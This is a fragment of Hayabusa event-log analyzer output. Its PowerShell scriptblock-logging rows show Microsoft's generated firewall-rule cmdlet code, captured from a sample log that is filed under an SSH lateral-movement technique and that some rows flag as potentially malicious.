+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 